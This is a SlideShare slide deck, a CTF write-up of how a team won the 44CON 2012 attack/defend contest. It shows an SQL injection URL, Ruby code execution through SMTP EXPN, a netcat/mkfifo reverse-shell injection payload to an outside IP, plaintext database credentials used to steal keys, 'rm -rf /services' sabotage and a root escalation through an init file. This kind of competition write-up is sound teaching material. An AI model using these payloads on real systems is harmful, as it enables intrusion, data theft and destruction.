Playing 44CON CTF for fun and profit

1,500 views

Published on

Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,500
On SlideShare
0
From Embeds
0
Number of Embeds
216
Actions
Shares
0
Downloads
51
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide

Playing 44CON CTF for fun and profit

  1. 1. Playing the 44Con CTF for fun & profit
  2. 2. Me"Three Headed Monkeys"3hm@0xbadf00d.co.uk@impdefined
  3. 3. MeSoftware developer Trying not to make things worse Know a lot about bugsCTF team 0xbadf00dContributor to io.smashthestack.org
  4. 4. CTFSolving technical security challenges to getpoints."Its kind of like a Computer Science exam onacid"* * CSAW CTF "About"page
  5. 5. CTF TypesChallenge-based DEF CON quals Ghost In The Shellcode CSAW CTFAttack/defend DEF CON finals 44Con CTF (this year)
  6. 6. 44CON CTF
  7. 7. 44CON CTF - What we gotVirtual Machine imageIP AddressScope of "attackable" machines
  8. 8. Attack & DefendKind of like a pentest (maybe, Ive never done a pentest)I have a plan: Recon Harden Write exploits Run riot Get the girl Save the world
  9. 9. Step 1 - ReconId rather be offline than ownedSelf-reconCapture trafficQuick nmap of non-player servers
  10. 10. Recon - Services
  11. 11. Recon - Services
  12. 12. Recon - ScoringRegular "scoring rounds" Score server stores new keys in services Score server checks for previous keys?Every 30 minutes Not great if youre trying to see talks!
  13. 13. pastie
  14. 14. Pastie
  15. 15. Pastie
  16. 16. PastieWritten in PHPPastes stored in a MySQL database Recon shows keys are stored as pastesPHP+MySQL - Can you tell what the vuln isyet?
  17. 17. Pastie vuln
  18. 18. Pastie vuln C Classic SQL injection
  19. 19. Pastie fixIts not all pwnpwnpwnNot very sexyUpdated to use prepared statements
  20. 20. Pastie exploitI want keys!Had a look at my own DB to figure out thequery
  21. 21. Pastie exploit https://ip/view/%+and+lang+=+text+order +by+date+desc+--+
  22. 22. Pastie exploit
  23. 23. Pastie exploit - scripted
  24. 24. mailserver
  25. 25. MailserverSMTP and POP3 serverKeys are stored in emailsWritten in Ruby I dont know Ruby ~ 500 lines
  26. 26. Mailserver - vulnerability
  27. 27. Mailserver - vulnerability ???This just runs whatever Ruby code you give itTime to learn Ruby!
  28. 28. Mailserver - verificationLooking at the logs...
  29. 29. Mailserver - exploitationIm sure Ruby is lovely...... but lets just find some code to copy
  30. 30. Mailserver - exploitation
  31. 31. Mailserver - exploitation
  32. 32. Mailserver - scripted exploitation
  33. 33. auth
  34. 34. AuthRunning on port 23500
  35. 35. Auth
  36. 36. Auth - vulnerabilitySource analysis 101
  37. 37. Auth - exploitation
  38. 38. Auth - exploitationClassic stack buffer overflowOverwrite return address with value of mychoiceRemote code execution.........right?
  39. 39. Auth - exploitationWelcome to CTF rage
  40. 40. Auth - exploitation
  41. 41. Auth - exploitationJust put a valid writable address in the bufferptr!Easy if this was a 32bit process.Our memory space is annoying.
  42. 42. Auth - exploitationgdb$ info proc mapMapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
  43. 43. Auth - exploitationgdb$ info proc mapMapped address spaces: Start Addr End Addr Size Offset objfile0x0000000000 400000 0x0000000000403000 0x3000 0x0 /services/auth/auth0x0000000000 602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth0x0000000000 603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth0x0000000000 604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ......0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)
  44. 44. Auth - exploitationTimes up!No remote code execution :-(Very limited DoS Crash process Restarts automatically
  45. 45. servicemon
  46. 46. ServicemonWeb pageLooks like it monitors the other servicesRuby again
  47. 47. Servicemon - vulnerability Command execution of "filelist" parameter
  48. 48. Servicemon - exploitation Never mind keys, I want a shellcontestant@ubuntu:~$ nc -l 31337 -e /bin/shnc: invalid option -- e
  49. 49. Servicemon - exploitation *cracks knuckles*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.1.75 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20% 2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff% 3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh% 20-i%202>%261%7Cnc%20192.168.1.75% 2031337%20>%2Ftmp%2Ff
  50. 50. Servicemon - exploitationcontestant@ubuntu:~$ nc -lv 31337Connection from 192.168.1.72 port 31337 [tcp/*]accepted$ whoamicontestant$ pwd/services/servicemon Now we can have some fun!
  51. 51. rampage
  52. 52. Steal all the keysmysql --user=sinatra --password=44ConCTF servicemon -e "selectstatus from statuses order by created_at desc limit 1;"mysql --user=pastie --password=J@cobsClub$ paste -e "selectpastie from pastie order by date desc limit 1;"OUTPUT=redis-cli -r 1 keys * | tail -n 1redis-cli -r 1 lrange $OUTPUT 0 1
  53. 53. Leave a calling cardecho Look behind you! A three-headed monkey! >/services/pastie/.win
  54. 54. Annoyecho export PROMPT_COMMAND="cd">> ~/.bashrcecho exit >> ~/.bashrcrm -rf /services
  55. 55. escalation
  56. 56. EscalationGetting keys is fineGetting shells is betterGetting root is best
  57. 57. Escalation - the hard way$ find /etc -writable/etc/init/mail.conf/etc/init/auth.conf
  58. 58. Escalation - the hard wayUSER PID TTY STAT COMMANDroot 8680 ? Ss /services/auth/auth
  59. 59. Escalation - the hard wayNext time auth respawns we will get a root shellLame DoS to the rescue!perl -e print "auth " . "A"x1100 . "n" | nc ip 23500Connection from 192.168.1.73 port 31337 [tcp/*] accepted# whoamiroot
  60. 60. Escalation - the easy way220 Mail Service ready (33147)HELO250 Requested mail action okay, completedEXPN respond(client, `whoami`)root
  61. 61. summary
  62. 62. SummaryCTFs are fun! http://smashthestack.org - start with io http://overthewire.org http://hackthissite.org
  63. 63. questions

×